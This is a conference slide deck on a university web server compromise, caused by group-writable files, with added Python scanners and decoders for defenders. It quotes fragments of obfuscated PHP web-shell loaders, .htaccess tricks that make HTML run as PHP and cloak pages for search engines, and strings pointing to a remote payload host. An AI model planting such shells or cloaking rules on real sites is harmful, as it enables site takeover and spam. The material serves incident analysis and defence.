Date posted: 25-Dec-2014
Uploaded by: patrick-laverty
Anatomy of a Web Server Hack (it wasn't fun or profitable) (for me)
Patrick Laverty, Brown University
OWASP Rhode Island / BSides Rhode Island
Twitter: @ProvWebAppSec
Who Am I?
• Programmer/WebSec guy at Brown University
• PaulDotCom Intern
• http://www.securitybsides.com/BSidesRI
• OWASP Rhode Island
What Happened?
• We got DoS'd
• (Unintentionally) By
Step Back - Timeline
• Holiday weekend, 1 dept site down
• Reports pharmaspam in Google results
• 7 pm, database server maxed out
• Kill processes, they come back
• Renaming databases, sites down
• But most importantly…
Protect www.brown.edu
Why Did It Happen?
• We're a University
• Open and easy
• Security is a hassle
OK, Really Why?
• One word: FilePermissions
• Two words: File Permissions
• >1200 accounts
• 600 GB of files
• Hundreds of sites
OK, Really Why?
• More history:
  – Solaris web server
  – 16 groups per user max
  – Web server user
  – Thousands of groups on server
  – World readable
OK, Really Why?
• rwxrwxr-‐x • Security Problem?
14
OK, Really Why?
• rwxrwxr-‐x • Security Problem?
• Config files & db connecSon scripts • mysql_connect(db,user,password);
• Policy: No sensiSve info
15
OK, Really Why?
• Upgraded to Red Hat Linux
• No limit on groups
• Put the web server user in every group
• Removed world read, i.e. rwxrwx---
• Everything is writeable! (group-writable files plus a web server user in every group means the web server can write every file)
• Whoops
Discovery
<?php eval(gzinflate(base64_decode('5b1rd9u20ij8OV2r/wFmtUupkWVJTtLUthQ7jp04TezUl1xq56iUREmsKVElKStu6v9+ZgYXArzIstP9PO9Zb/ZuIgKDwQAYAAPMYOb770rOLB51pk4UsRaz1hvNevfpzz93+93HP7u/1Hv9p/31R936et1xm48f963N778r9QI/CBH6h/7gMaX03YEz8+OO04u9YAJZ9r7nu9FbZ2Lr2b…
What Can That Do? / What DID It Do?
• Add new files
• Edit current files
• Find places to hide files
• Change timestamps
• Examples?
Stupid .htaccess Tricks I
RemoveHandler .html .htm
AddType application/x-httpd-php .php .htm .html
(Every .htm/.html file in that directory now runs as PHP, so a "static" page can carry the shell.)
Stupid .htaccess Tricks II
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo) [OR]
RewriteCond %{HTTP_REFERER} (google|aol|yahoo)
RewriteBase /
RewriteCond %{THE_REQUEST} /
RewriteCond %{REQUEST_URI} !/stats\.php
RewriteRule .+ stats.php [L]
</IfModule>
(Search-engine crawlers, and visitors arriving from a search engine, get every URL rewritten to stats.php; anyone else sees the real site.)
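A scanner for the two .htaccess tricks above, as an added example (not code from the talk): it flags AddType/AddHandler lines that bolt a PHP handler onto extensions that should be static, and RewriteCond/RewriteRule chains that key on a search-engine user agent or referrer. The list of engine names, the extension list and the sample .htaccess contents are assumptions constructed here; the two trick samples are the ones from the slides.

```python
"""Added example: flag 'PHP handler on .html' and mod_rewrite cloaking in .htaccess."""
import re
from dataclasses import dataclass
from typing import List

# Extensions the server should serve as static content; a PHP handler on them is a red flag.
NON_PHP_EXT = {".html", ".htm", ".txt", ".css", ".js", ".jpg", ".png", ".gif"}
# Engines a cloaking rule typically matches on (assumption: extend for your environment).
SEARCH_ENGINES = re.compile(r"google|yahoo|bing|aol|msn", re.I)
UA_OR_REFERER = {"%{HTTP_USER_AGENT}", "%{HTTP_REFERER}"}


@dataclass
class Finding:
    line_no: int
    kind: str
    text: str


def scan_htaccess(content: str) -> List[Finding]:
    findings: List[Finding] = []
    cloak_conds: List[int] = []  # crawler/referrer RewriteConds waiting for their RewriteRule
    for n, raw in enumerate(content.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        directive = parts[0].lower()
        # Trick I: AddType/AddHandler a PHP type onto non-PHP extensions
        if directive in ("addtype", "addhandler") and len(parts) >= 3 and "php" in parts[1].lower():
            if any(ext.lower() in NON_PHP_EXT for ext in parts[2:]):
                findings.append(Finding(n, "php-handler-for-non-php", line))
        # Trick II: RewriteConds on UA/referrer naming a search engine ...
        elif directive == "rewritecond" and len(parts) >= 3:
            if parts[1].upper() in UA_OR_REFERER and SEARCH_ENGINES.search(parts[2]):
                cloak_conds.append(n)
        # ... consumed by the next RewriteRule, which is the cloaking redirect
        elif directive == "rewriterule":
            if cloak_conds:
                findings.append(Finding(n, "search-engine-cloaking", line))
            cloak_conds = []  # a RewriteRule consumes every RewriteCond before it
    return findings


def kinds(content: str) -> List[str]:
    return [f.kind for f in scan_htaccess(content)]


# Constructed samples: the two tricks from the slides plus a benign HTTPS redirect.
TRICK_I = "RemoveHandler .html .htm\nAddType application/x-httpd-php .php .htm .html\n"
TRICK_II = r"""<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo) [OR]
RewriteCond %{HTTP_REFERER} (google|aol|yahoo)
RewriteBase /
RewriteCond %{THE_REQUEST} /
RewriteCond %{REQUEST_URI} !/stats\.php
RewriteRule .+ stats.php [L]
</IfModule>
"""
BENIGN = ("RewriteEngine On\nRewriteCond %{HTTPS} off\n"
          "RewriteRule ^ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]\n"
          "AddType application/x-httpd-php .php\n")

if __name__ == "__main__":
    for name, sample in (("trick I", TRICK_I), ("trick II", TRICK_II), ("benign", BENIGN)):
        print(name, [(f.line_no, f.kind) for f in scan_htaccess(sample)])
```

Run it over `find /var/www -name .htaccess` output; with hundreds of sites, a clean inventory of which .htaccess files carry handler or rewrite directives at all is the useful first pass, and the two kinds above are the ones to pull immediately.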
Weird Google Results
Two Views
• Browser: normal
• Google, Yahoo, other search spiders?
Look Familiar?
<?php
//Packed MySQL query core
$a4f12b6950e98b=str_rot13('tmhapbzcerff');$a4f12b6950e98f=str_rot13(strrev('rqbprq_46rfno'));
eval($a4f12b6950e98b($a4f12b6950e98f('eF6NVGu2kAQ/ZU8VCKRqgrbJZFV5YGoxQilVLitvd6qinyBILApCiHBfH13zSAktkoL7OGOXM7uzO7H4LbHzf9259/OndO1+85zlX38uqu8/e6…
(str_rot13('tmhapbzcerff') is gzuncompress and str_rot13(strrev('rqbprq_46rfno')) is base64_decode, so this is eval(gzuncompress(base64_decode(...))): the same packing as the first shell, with the function names hidden so a grep for eval(gzinflate( misses it.)
De-obfuscated (Uh-Oh)
max_execution_time
set_time_limit
http://files-uploader.com/7291-bred/
…
REMOTE_ADDR
QUERY_STRING
SERVER_SIGNATURE
REQUEST_URI
REMOTE_ADDR
…
allow_url_fopen
curl_init
viagra
cialis
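Getting from the packed blob to the string list above by hand is the slow part of this kind of investigation. The following is an added example, not the talk's own tooling: it resolves the str_rot13()/strrev() name-hiding from the "Look Familiar?" shell, peels the base64 / gzuncompress / gzinflate layers both shells used, and lists the suspicious calls. The inner payload here is a constructed stand-in (a `phpinfo()` call), not the real shell body, and the function names in `SUSPICIOUS` are a starting list, not a complete one.

```python
"""Added example: unpack eval(gz*(base64_decode(...))) shells and resolve rot13 names."""
import base64
import binascii
import re
import zlib
from typing import List, Tuple

ROT13_CALL = re.compile(r"str_rot13\(\s*(strrev\()?\s*'([^']*)'\s*\)?\s*\)")
SUSPICIOUS = {"eval", "gzinflate", "gzuncompress", "base64_decode", "str_rot13",
              "strrev", "assert", "preg_replace", "create_function", "system",
              "passthru", "shell_exec"}
_ROT13 = str.maketrans("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz",
                       "NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm")


def resolve_rot13_names(src: str) -> List[str]:
    """Plaintext of every str_rot13('..') / str_rot13(strrev('..')) literal in src.
    PHP evaluates strrev first, so reverse before rotating in that case."""
    return [(lit[::-1] if rev else lit).translate(_ROT13) for rev, lit in ROT13_CALL.findall(src)]


def flag_php(src: str) -> List[str]:
    """Sorted suspicious function names, called directly or hidden behind rot13 literals."""
    direct = set(re.findall(r"\b([a-z_0-9]+)\s*\(", src))
    return sorted((direct | set(resolve_rot13_names(src))) & SUSPICIOUS)


def _is_b64(data: bytes) -> bool:
    return len(data) >= 8 and re.fullmatch(rb"[A-Za-z0-9+/]+={0,2}", data) is not None


def _looks_like_text(data: bytes) -> bool:
    try:
        return all(c.isprintable() or c.isspace() for c in data.decode("utf-8"))
    except UnicodeDecodeError:
        return False


def unwrap(blob, max_layers: int = 10) -> Tuple[bytes, List[str]]:
    """Peel base64 -> zlib (gzuncompress) -> raw deflate (gzinflate) layers, in any
    order, until readable source remains. Returns (innermost bytes, PHP layer names)."""
    data = blob.encode() if isinstance(blob, str) else bytes(blob)
    layers: List[str] = []
    for _ in range(max_layers):
        stripped = re.sub(rb"\s+", b"", data)
        if _is_b64(stripped):
            stripped += b"=" * (-len(stripped) % 4)  # PHP base64_decode tolerates missing padding
            try:
                data = base64.b64decode(stripped, validate=True)
                layers.append("base64_decode")
                continue
            except (binascii.Error, ValueError):
                pass
        # zlib header: CM=8 and the 16-bit CMF/FLG value is a multiple of 31
        if len(data) >= 2 and data[0] & 0x0F == 8 and ((data[0] << 8) | data[1]) % 31 == 0:
            try:
                data = zlib.decompress(data)
                layers.append("gzuncompress")
                continue
            except zlib.error:
                pass
        if _looks_like_text(data):
            break  # reached source code (eval'd bodies usually have no <?php tag)
        try:
            data = zlib.decompress(data, -15)  # raw deflate, i.e. PHP gzinflate
            layers.append("gzinflate")
        except zlib.error:
            break
    return data, layers


def pack_gzuncompress(php: bytes) -> str:
    """Second shell's packing: base64(zlib(php)), read back with gzuncompress."""
    return base64.b64encode(zlib.compress(php, 9)).decode()


def pack_gzinflate(php: bytes) -> str:
    """First shell's packing: base64(raw deflate(php)), read back with gzinflate."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return base64.b64encode(c.compress(php) + c.flush()).decode()


# Constructed samples (not the incident's payload): a harmless body packed both ways,
# and a wrapper in the style of the "Look Familiar?" slide.
INNER_PHP = b"// constructed sample body, not the real shell\nphpinfo();\n"
SAMPLE_GZUNCOMPRESS = pack_gzuncompress(INNER_PHP)
SAMPLE_GZINFLATE = pack_gzinflate(INNER_PHP)
SLIDE_STYLE = ("<?php\n$a4f12b6950e98b=str_rot13('tmhapbzcerff');"
               "$a4f12b6950e98f=str_rot13(strrev('rqbprq_46rfno'));\n"
               "eval($a4f12b6950e98b($a4f12b6950e98f('" + SAMPLE_GZUNCOMPRESS + "')));\n")

if __name__ == "__main__":
    print(flag_php(SLIDE_STYLE))
    print(unwrap(SAMPLE_GZUNCOMPRESS))
```

Never `eval` the blob in PHP to see what it does; decoding it offline like this gives the string list (remote URL, REMOTE_ADDR, curl_init, the pharma keywords) without running attacker code on anything.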
What's There?
What Are Those?
Why the DoS? What Happens?
• Google as referrer -> hit page in .htaccess
• Page pulls in code from files-uploader.com
• Shows page selling Viagra
• Brown University = online pharmacy
• Plus, high Google ranking
How Do You Find It?
How'd We Fix It?
Immediate steps:
– Deleted the current offending uploader script & redirecting .htaccess files
– Traffic dropped off immediately
Ongoing steps:
– Remove all shell files
– Remove all uploader files
– Find and fix the .htaccess files
– Remove the web server user from groups as much as possible
– Weakened the shell files
– Set up shell file password search in logs
– Monthly meetings to review
How Else is it Being Fixed?
• One word… FilePermissions!
• Three options for site owners
Option 1
• One web editor?
• rwxr-x---
• Web server user in the group (group bits are r-x: it can read the site but not write it)
Option 2
• Multiple web editors
• rwxrwxr-x
• Web server user NOT in the group (it reads through the world bits)
• Back to original security problem
Option 3
• Virtual machine
• Do whatever you want!
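The whole story, from the Solaris-era 775 through the Red Hat 770-plus-every-group mistake to Options 1 and 2, is the same POSIX permission check with different inputs. The following is an added example, not anything from the talk: it evaluates each setup with one function, then walks a constructed docroot and reports what a non-owner "web server" uid could modify depending only on whether it carries the site group. The uid/gid numbers and the sample files are assumptions made here.

```python
"""Added example: the permission arithmetic behind the talk, plus a writable-by-webserver audit."""
import os
import stat
import tempfile
from typing import Dict, List, Set, Tuple

EDITOR_UID, EDITOR_GID = 1001, 1001  # assumption: the site editor owns the files
WEB_UID, WEB_GID = 48, 48            # assumption: RHEL 'apache' user/group


def can_access(mode: int, owner: int, group: int, uid: int, gids: Set[int], bit: str) -> bool:
    """POSIX picks exactly one class: owner if uid matches, else group if the file's gid
    is one of the user's groups, else other. bit is 'r' or 'w'. Root is not modelled."""
    cls = "USR" if uid == owner else "GRP" if group in gids else "OTH"
    return bool(mode & getattr(stat, f"S_I{bit.upper()}{cls}"))


def policy_table() -> Dict[str, Tuple[bool, bool, bool]]:
    """(web server reads, web server writes, any local user reads) per setup from the slides."""
    setups = {
        # Solaris: 775; 16-group cap kept the server out of site groups, so it read via 'other'
        "solaris_775_not_in_group": (0o775, set()),
        # Red Hat: world read removed (770) but server in EVERY group -> group write applies
        "redhat_770_in_every_group": (0o770, {EDITOR_GID}),
        # Option 1: 750, server in the single editor's group: read yes, write no
        "option1_750_in_group": (0o750, {EDITOR_GID}),
        # Option 2: 775, server not in the group: works, but world-readable again
        "option2_775_not_in_group": (0o775, set()),
    }
    out = {}
    for name, (mode, extra_gids) in setups.items():
        gids = extra_gids | {WEB_GID}
        out[name] = (can_access(mode, EDITOR_UID, EDITOR_GID, WEB_UID, gids, "r"),
                     can_access(mode, EDITOR_UID, EDITOR_GID, WEB_UID, gids, "w"),
                     can_access(mode, EDITOR_UID, EDITOR_GID, 60000, set(), "r"))
    return out


def audit_tree(root: str, uid: int, gids: Set[int]) -> List[str]:
    """Paths under root that (uid, gids) could write: a writable directory means new
    files can be dropped, a writable file means it can be edited into a shell."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue  # lstat describes the link, not its target
            if can_access(st.st_mode, st.st_uid, st.st_gid, uid, gids, "w"):
                hits.append(os.path.relpath(path, root))
    return sorted(hits)


def demo() -> Dict[str, List[str]]:
    """Constructed docroot: a group-writable connect script, a 644 page, a 775 upload
    directory. The 'web server' is a fake non-owner uid; only its group membership varies."""
    with tempfile.TemporaryDirectory() as root:
        os.mkdir(os.path.join(root, "uploads"))
        for rel, mode in (("db_connect.php", 0o770), ("index.html", 0o644), ("uploads", 0o775)):
            path = os.path.join(root, rel)
            if not os.path.isdir(path):
                with open(path, "w") as f:
                    f.write("// constructed sample\n")
            os.chmod(path, mode)
        site_gid = os.stat(os.path.join(root, "index.html")).st_gid
        fake_web_uid = os.getuid() + 1  # anybody but the owner
        return {
            "server_in_every_group": audit_tree(root, fake_web_uid, {site_gid}),
            "server_not_in_group": audit_tree(root, fake_web_uid, set()),
        }


if __name__ == "__main__":
    for name, row in policy_table().items():
        print(f"{name:28s} read={row[0]} write={row[1]} world_read={row[2]}")
    print(demo())
```

On a real server run `audit_tree(docroot, apache_uid, set_of_apache_gids)` with the values from `id apache`; everything it lists is a place the next uploader script can land. The table also makes the Option 2 trade-off explicit: the third column is the world-read exposure of the connection scripts that started the problem.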
Bottom Line
• Keep file permissions tight
• Keep software current
• Keep users off the server
Questions?
Contact Info: Patrick Laverty, Brown University
@provwebappsec or @BSidesRI